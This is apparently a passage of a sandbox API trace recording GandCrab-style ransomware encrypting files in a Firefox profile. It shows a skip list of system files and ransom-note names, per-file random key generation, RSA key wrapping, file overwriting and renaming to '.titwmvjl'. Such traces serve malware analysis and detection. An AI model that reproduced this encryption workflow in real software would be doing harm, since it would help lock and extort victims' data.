4\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0084.397] WriteFile (in: hFile=0x2dc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e068, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e068*=0x2162, lpOverlapped=0x0) returned 1 [0084.398] CloseHandle (hObject=0x2dc) returned 1 [0084.398] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.398] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.398] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1d, wMilliseconds=0x2ca)) [0084.398] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.399] GetWindowsDirectoryW (in: lpBuffer=0x2310000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0084.399] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2310200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2310600, lpMaximumComponentLength=0x2310608, lpFileSystemFlags=0x2310604, lpFileSystemNameBuffer=0x2310400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2310600*=0xd2ca4def, lpMaximumComponentLength=0x2310608*=0xff, lpFileSystemFlags=0x2310604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0084.399] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\d2ca4a09d2ca4deb61a.lock") returned 129 [0084.399] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2dc [0084.400] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.400] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.400] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\") returned 105 [0084.400] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*" [0084.400] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*", fInfoLevelId=0x1, lpFindFileData=0x259e084, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e084) returned 0x503638 [0084.400] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.400] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0084.401] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.401] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.401] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0084.401] lstrcmpW (lpString1=".metadata", lpString2=".") returned 1 [0084.401] lstrcmpW (lpString1=".metadata", lpString2="..") returned 1 [0084.401] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\", lpString2=".metadata" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata" [0084.401] lstrlenW (lpString=".titwmvjl") returned 9 [0084.401] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata") returned 114 [0084.401] VirtualAlloc (lpAddress=0x0, dwSize=0x124, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.401] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata.titwmvjl") returned 123 [0084.401] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata") returned 114 [0084.401] lstrlenW (lpString=".metadata") returned 9 [0084.401] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.402] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".metadata ") returned 10 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2=".titwmvjl") returned -1 [0084.402] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.402] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata") returned 114 [0084.402] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata") returned 114 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="desktop.ini") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="autorun.inf") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="ntuser.dat") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="iconcache.db") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="bootsect.bak") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="boot.ini") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="ntuser.dat.log") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="thumbs.db") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="KRAB-DECRYPT.html") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="CRAB-DECRYPT.html") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="KRAB-DECRYPT.txt") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="CRAB-DECRYPT.txt") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="ntldr") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="NTDETECT.COM") returned -1 [0084.402] lstrcmpiW (lpString1=".metadata", lpString2="Bootfont.bin") returned -1 [0084.402] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata") returned 114 [0084.402] lstrlenW (lpString=".metadata") returned 9 [0084.402] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.402] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".metadata ") returned 10 [0084.403] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.403] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.403] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2e0 [0084.404] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0084.404] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.404] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4c9980) returned 1 [0084.405] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0084.405] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.406] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.406] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0084.406] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.406] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.406] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.406] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.406] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4c9980) returned 1 [0084.407] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0084.407] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.408] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.408] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0084.408] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.428] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.428] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.430] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.430] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4c9980) returned 1 [0084.431] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.432] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503378) returned 1 [0084.432] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.432] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0084.432] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.432] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259df24*=0x100) returned 1 [0084.432] GetLastError () returned 0x0 [0084.432] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.432] CryptDestroyKey (hKey=0x503378) returned 1 [0084.432] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.433] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.433] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4c9980) returned 1 [0084.434] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.434] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503738) returned 1 [0084.434] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.434] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0084.435] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.435] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259df24*=0x100) returned 1 [0084.435] GetLastError () returned 0x0 [0084.435] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.435] CryptDestroyKey (hKey=0x503738) returned 1 [0084.435] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.435] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.435] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0084.436] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0084.436] ReadFile (in: hFile=0x2e0, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259dfd0*=0x1d, lpOverlapped=0x0) returned 1 [0084.450] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0xffffffe3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.450] WriteFile (in: hFile=0x2e0, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259dfb4*=0x1d, lpOverlapped=0x0) returned 1 [0084.451] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.451] WriteFile (in: hFile=0x2e0, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0084.453] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.457] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.457] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.458] CloseHandle (hObject=0x2e0) returned 1 [0084.458] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata.titwmvjl"), dwFlags=0x1) returned 1 [0084.459] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.459] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0084.459] lstrcmpW (lpString1=".metadata-v2", lpString2=".") returned 1 [0084.459] lstrcmpW (lpString1=".metadata-v2", lpString2="..") returned 1 [0084.459] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\", lpString2=".metadata-v2" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2" [0084.459] lstrlenW (lpString=".titwmvjl") returned 9 [0084.459] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2") returned 117 [0084.459] VirtualAlloc (lpAddress=0x0, dwSize=0x12a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.459] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2.titwmvjl") returned 126 [0084.460] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2") returned 117 [0084.460] lstrlenW (lpString=".metadata-v2") returned 12 [0084.460] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.460] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".metadata-v2 ") returned 13 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2=".titwmvjl") returned -1 [0084.460] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.460] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2") returned 117 [0084.460] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2") returned 117 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="desktop.ini") returned -1 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="autorun.inf") returned -1 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="ntuser.dat") returned -1 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="iconcache.db") returned -1 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="bootsect.bak") returned -1 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="boot.ini") returned -1 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="ntuser.dat.log") returned -1 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="thumbs.db") returned -1 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="KRAB-DECRYPT.html") returned -1 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="CRAB-DECRYPT.html") returned -1 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="KRAB-DECRYPT.txt") returned -1 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="CRAB-DECRYPT.txt") returned -1 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="ntldr") returned -1 [0084.460] lstrcmpiW (lpString1=".metadata-v2", lpString2="NTDETECT.COM") returned -1 [0084.461] lstrcmpiW (lpString1=".metadata-v2", lpString2="Bootfont.bin") returned -1 [0084.461] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2") returned 117 [0084.461] lstrlenW (lpString=".metadata-v2") returned 12 [0084.461] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.461] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".metadata-v2 ") returned 13 [0084.461] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.461] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.461] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\.metadata-v2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2e0 [0084.462] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0084.462] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.462] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4c9980) returned 1 [0084.463] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0084.463] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.464] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.464] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0084.464] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.464] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.464] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.464] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.464] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4c9980) returned 1 [0084.465] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0084.466] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.466] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.466] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0084.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.466] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.466] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.466] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4c9980) returned 1 [0084.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.468] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5032f8) returned 1 [0084.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.468] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0084.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.468] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259df24*=0x100) returned 1 [0084.468] GetLastError () returned 0x0 [0084.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.469] CryptDestroyKey (hKey=0x5032f8) returned 1 [0084.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.469] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.469] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4c9980) returned 1 [0084.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.471] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, 